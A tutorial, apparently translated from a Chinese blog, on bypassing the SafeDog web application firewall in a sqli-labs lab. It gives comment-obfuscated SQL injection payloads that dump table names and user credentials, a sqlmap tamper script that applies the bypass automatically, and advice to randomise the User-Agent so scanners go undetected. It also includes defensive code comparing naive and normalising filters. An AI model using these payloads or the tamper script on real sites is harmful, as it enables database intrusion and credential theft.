WAF Bypass: Introduction and Hands-On Practice
Preface
WAF is short for "Web Application Firewall", also marketed as a "web application-level intrusion prevention system". Commercial WAF products typically bundle web attack protection, page tamper protection, load balancing and application delivery into a single appliance.
By form factor, WAFs fall into hardware WAFs, software WAFs and cloud WAFs.
This article covers only one software WAF and simple bypasses of it: 安全狗 (SafeDog).
SafeDog environment setup
We install SafeDog and test against it. SafeDog's Apache edition attaches to Apache as a Windows service, so both Apache and MySQL from phpstudy are registered as services first.
Open cmd as Administrator and run:
cd C:\phpstudy\PHPTutorial\Apache\bin   (the bin directory of phpstudy's Apache)
httpd.exe -k install -n apache2.4       (register Apache as a service named apache2.4)
cd C:\phpstudy\PHPTutorial\MySQL\bin    (the bin directory of phpstudy's MySQL)
mysqld --install mysql                   (register MySQL as a service named mysql)
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214215824746-760042202.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214220418669-595106286.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214220650415-2001042978.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214220730075-1926202478.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214221124230-1005285027.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214221326474-370698111.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214221520299-499431944.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230214222144597-1157181820.png
1. Bypass testing with Burp
Capture the request with Burp and brute-force the keyword position to test for bypasses.
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216185652381-1989861369.png
SafeDog intercepts the request when union and select appear together; sometimes a lone union or select is intercepted as well.
So we replace the space between union and select with candidate strings: mark that position in Intruder, brute-force it with a list of separators, and treat any response whose length matches the normal page as a successful bypass (a blocked request returns SafeDog's interception page, which has a different length).
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216203648640-1492598956.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216213849673-219789757.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216214236886-103448146.png
Every bypass below was found this way, manually with Burp.
WAF bypass for SQL injection
The tests below use sqli-labs as the target.
Determine the number of columns
http://192.168.31.198/sqli-labs/Less-1/?id=1%27%20order/*%2f%2f!*/by%204%23
Decoded: 1' order/*//!*/by 4#
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216214718500-1723458749.png
Find the displayed columns with a union query
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,2,3%23
Decoded: -1' /*!10496union*//*/-*!/*/select/*//!*/1,2,3#
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216183956615-1419611987.png
Read the database name
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,database/*%2f%2f!*/(/*%2f%2f!*/),3%23
Decoded: -1' /*!10496union*//*/-*!/*/select/*//!*/1,database/*//!*/(/*//!*/),3#
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216183914822-1994547594.png
List the tables
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,2,group_concat(table_name)from/*!--+/*%0A(information_schema.tables)*//*%2f%2f!*/where/*%2f%2f!*/table_schema=%22security%22%23
Decoded (%0A shown as \n): -1' /*!10496union*//*/-*!/*/select/*//!*/1,2,group_concat(table_name)from/*!-- /*\n(information_schema.tables)*//*//!*/where/*//!*/table_schema="security"#
Note the trick around information_schema.tables: inside the executed /*! ... */ version comment, "-- " starts a line comment that swallows the "/*" up to the newline, so MySQL sees "from (information_schema.tables)" while the WAF sees a block comment.
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216184043280-562990899.png
List the columns
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,2,group_concat(column_name)from/*!--+/*%0A(information_schema.columns)*//*%2f%2f!*/where/*%2f%2f!*/table_schema=%22security%22%20and/*%2f-*!%2f*/table_name=%22users%22%23
Decoded (%0A shown as \n): -1' /*!10496union*//*/-*!/*/select/*//!*/1,2,group_concat(column_name)from/*!-- /*\n(information_schema.columns)*//*//!*/where/*//!*/table_schema="security" and/*/-*!/*/table_name="users"#
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216184121498-495681410.png
Dump the data
http://192.168.31.198/sqli-labs/Less-1/?id=-1%27%20/*!10496union*//*%2f-*!%2f*/select/*%2f%2f!*/1,group_concat(username),group_concat(password)from%20users%23
Decoded: -1' /*!10496union*//*/-*!/*/select/*//!*/1,group_concat(username),group_concat(password)from users#
(A plain space before "users" is enough here: the rule that fires is keyed on the union/select pair, not on every keyword.)
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216184154223-1575906727.png
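The Intruder run in section 1 and the comment-based payloads above both exploit the same gap: the signature keys on the whitespace between union and select, while MySQL accepts comments there. The following is an added example, not code from the original post or from SafeDog. It is a small Python model of MySQL comment handling, a whitespace-keyed rule, the same rule applied after normalisation, and the separator fuzz loop from section 1. The separator list, the rule regex and the assumption that the server satisfies every /*!NNNNN version comment are mine; the two payload constants are the URL-decoded forms of payloads shown above.

```python
import re

# Simplified model of how MySQL tokenises comments. Assumption: the server
# version satisfies every /*!NNNNN ... */ version comment, so its body is
# executed (the page's /*!10496 ... */ means "MySQL >= 1.04.96", i.e. any
# server). Ordinary /* ... */ comments become whitespace.
_BLOCK_COMMENT = re.compile(r"/\*!\d*(.*?)\*/|/\*.*?\*/", re.S)
_LINE_COMMENT = re.compile(r"(?:#|--\s).*?$", re.M)


def normalize_mysql(sql):
    """Return the text MySQL will actually parse: version-comment bodies are
    kept, ordinary block comments become whitespace, #/-- comments are dropped
    and runs of whitespace are collapsed."""
    sql = _BLOCK_COMMENT.sub(lambda m: " " + (m.group(1) or "") + " ", sql)
    sql = _LINE_COMMENT.sub(" ", sql)
    return " ".join(sql.split())


# A signature that keys on the whitespace between the two keywords; this is
# the behaviour the Intruder run exploits.
UNION_SELECT = re.compile(r"union\s+select", re.I)


def naive_waf_blocks(raw):
    """Pattern-match the raw parameter value."""
    return UNION_SELECT.search(raw) is not None


def normalizing_waf_blocks(raw):
    """Same signature, but applied to what the database will see."""
    return UNION_SELECT.search(normalize_mysql(raw)) is not None


# Constructed separator candidates, the kind of list fed to Intruder.
SEPARATORS = [" ", "\n", "\t", "/**/", "/*!*/", "/*//!*/", "/*/-*!/*/"]


def fuzz_separators(blocks, separators=SEPARATORS):
    """Try each candidate between UNION and SELECT and return the separators
    that the given WAF logic lets through (the 'bypass' hits)."""
    return [sep for sep in separators
            if not blocks(f"-1' union{sep}select 1,2,3#")]


# URL-decoded forms of two payloads from the walkthrough above.
ORDER_BY_PAYLOAD = "1' order/*//!*/by 4#"
UNION_PAYLOAD = "-1' /*!10496union*//*/-*!/*/select/*//!*/1,2,3#"


if __name__ == "__main__":
    for name, payload in (("order by", ORDER_BY_PAYLOAD), ("union", UNION_PAYLOAD)):
        print(f"{name}: raw={payload!r}")
        print(f"  mysql sees={normalize_mysql(payload)!r} "
              f"naive={naive_waf_blocks(payload)} "
              f"normalizing={normalizing_waf_blocks(payload)}")
    print("separators that beat the naive rule:",
          fuzz_separators(naive_waf_blocks))
    print("separators that beat the normalizing rule:",
          fuzz_separators(normalizing_waf_blocks))
```

Every comment-based separator in the list gets past the whitespace-keyed rule and none gets past the normalising one, which is the property to look for when evaluating a WAF: it must inspect what the database parser will see, not the bytes on the wire. The model is deliberately small (no string literals, no nested-comment quirks), so treat it as a way to reason about a rule, not as a drop-in detector.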
2. Bypass testing with an automated script
Add the bypass script to sqlmap's built-in tamper directory and let sqlmap run the scan:
sqlmap -u "http://192.168.31.198/sqli-labs/Less-1/?id=1" --tamper=anquangou --random-agent
Note: --tamper=anquangou selects the custom script that applies the SafeDog bypass to every payload sqlmap sends.
--random-agent rotates the User-Agent header. SafeDog recognises automated scanners such as sqlmap (and other blind-injection tools) by their default User-Agent and blocks them outright, so a random UA keeps sqlmap's own identifier out of the request.
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216220515428-1741493095.png
https://img2023.cnblogs.com/blog/2913000/202302/2913000-20230216221032095-292162402.png
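The anquangou script used above is not reproduced in the post. The following is an added example, not the author's script and not a file shipped with sqlmap: a tamper in the same style, generating the comment separators seen in the manual payloads of section 1. The file name safedog_comment.py and the version number 10496 are assumptions taken from those payloads; the PRIORITY import and the dependencies()/tamper() entry points are sqlmap's tamper interface, and the "first space" rule for quote tracking follows sqlmap's own space2comment tamper.

```python
#!/usr/bin/env python
"""
safedog_comment.py (hypothetical name): a sqlmap tamper script that rewrites
keyword boundaries the way the manual payloads above do. Save it in sqlmap's
tamper/ directory and run with --tamper=safedog_comment.
"""
import re

try:
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:
    # Running outside the sqlmap tree (e.g. importing the module to test it).
    __priority__ = 0

SEP = "/*//!*/"                # separator the walkthrough uses between keywords
SEP_AFTER_UNION = "/*/-*!/*/"  # the one that followed UNION in those payloads
UNION = re.compile(r"\bUNION\b", re.I)


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Replace every whitespace run outside string literals with a MySQL inline
    comment and wrap UNION in a version comment, e.g.

    "1' UNION ALL SELECT 1,2,3#"
    -> "1'/*//!*//*!10496UNION*//*/-*!/*/ALL/*//!*/SELECT/*//!*/1,2,3#"
    """
    if not payload:
        return payload
    out = []
    quote = None               # quote character of the literal we are inside
    seen_first_space = False   # quote tracking starts after the first space:
                               # sqlmap's boundary prefix ("1'") would otherwise
                               # be mistaken for an opening quote
    after_union = False
    i, n = 0, len(payload)
    while i < n:
        ch = payload[i]
        if ch.isspace() and quote is None:
            while i < n and payload[i].isspace():   # collapse the whole run
                i += 1
            out.append(SEP_AFTER_UNION if after_union else SEP)
            after_union = False
            seen_first_space = True
            continue
        after_union = False
        if quote is not None:
            if ch == quote:
                quote = None
        elif ch in "'\"" and seen_first_space:
            quote = ch
        else:
            m = UNION.match(payload, i)
            if m:
                out.append("/*!10496" + m.group(0) + "*/")
                after_union = True
                i = m.end()
                continue
        out.append(ch)
        i += 1
    return "".join(out)


if __name__ == "__main__":
    for sample in ("1' UNION ALL SELECT 1,2,3#", "1 ORDER BY 4", "1' AND 'a b'='a b'"):
        print(sample, "->", tamper(sample))
```

Whitespace inside string literals is left alone, since a comment inside a quoted value would change the data rather than the syntax. Like every tamper, this one is tied to the exact rule it was built against: re-run the Intruder fuzz after a SafeDog update and adjust the separators rather than assuming the script still works.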
Summary
1. Most WAFs on the market are variants of the same basic designs; manual guessing with Burp is an effective way to find the characters and keyword forms a given WAF lets through.
2. Web-server features can be used, e.g. IIS-style %u encoding (%u0053 decodes to S on IIS, while many WAFs do not decode it) or switching the way parameters are passed to confuse the WAF's parameter parsing.
3. Application-layer features can be used, e.g. simple case variation, doubled keywords (ununionion), multiple layers of URL encoding and HTTP parameter pollution.
4. WAF-layer weaknesses can be used: logic flaws in cloud, software and hardware WAFs (e.g. a WAF that stops parsing at a %00 null byte and never inspects what follows) and performance limits (under heavy Burp brute-forcing or race-condition load a WAF may degrade and stop inspecting or blocking).
5. Database features can be used: spaces in a SQL statement can be replaced with newlines or other characters the database tolerates, at each of the five positions in a statement where such substitutions are possible.
6. Existing automated scripts can be used, running the scan with sqlmap and a tamper script.
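To make items 3 and the summary's general point concrete, here is an added example that is not part of the original post: a toy keyword filter with exactly the weaknesses those items exploit (case-sensitive, single removal pass, no decoding), next to a hardened version, run over constructed payloads. The filter, the payloads and the assumption that the web framework URL-decodes the parameter once before it reaches the query are mine.

```python
import re
from urllib.parse import unquote

# Constructed payloads, one per bypass family from the summary.
PAYLOADS = {
    "case": "1' UnIoN SeLeCt 1,2,3#",
    "double-write": "1' ununionion seselectlect 1,2,3#",
    "url-encode": "1'%20%75nion%20%73elect%201,2,3#",
}
KEYWORDS = ("union", "select")
# Models MySQL's case-insensitive keywords; a match here means the injection
# reached the database intact.
ATTACK = re.compile(r"union\s+select", re.I)


def naive_filter(value):
    """Weak design: one case-sensitive removal pass over the raw parameter."""
    for kw in KEYWORDS:
        value = value.replace(kw, "")
    return value


def hardened_filter(value):
    """Decode to a fixed point, then strip keywords case-insensitively until
    nothing changes, so doubled and encoded keywords cannot survive."""
    previous = None
    while previous != value:            # multiply URL-encoded input
        previous, value = value, unquote(value)
    previous = None
    while previous != value:            # doubled keywords
        previous = value
        for kw in KEYWORDS:
            value = re.sub(re.escape(kw), "", value, flags=re.I)
    return value


def backend_sees(value):
    """Assumption: the framework URL-decodes the parameter exactly once."""
    return unquote(value)


def bypasses(filter_fn, payload):
    """True when 'union select' still reaches the database after filtering."""
    return ATTACK.search(backend_sees(filter_fn(payload))) is not None


def evaluate(filter_fn):
    return {name: bypasses(filter_fn, p) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    print("naive   :", evaluate(naive_filter))
    print("hardened:", evaluate(hardened_filter))
```

All three payloads pass the naive filter and none passes the hardened one. Two caveats a practitioner should keep in mind: stripping keywords is still sanitisation, and a WAF should reject (or at least log) such input rather than rewrite it; and none of this replaces parameterised queries in the application, which is the only fix that does not depend on guessing the attacker's encoding.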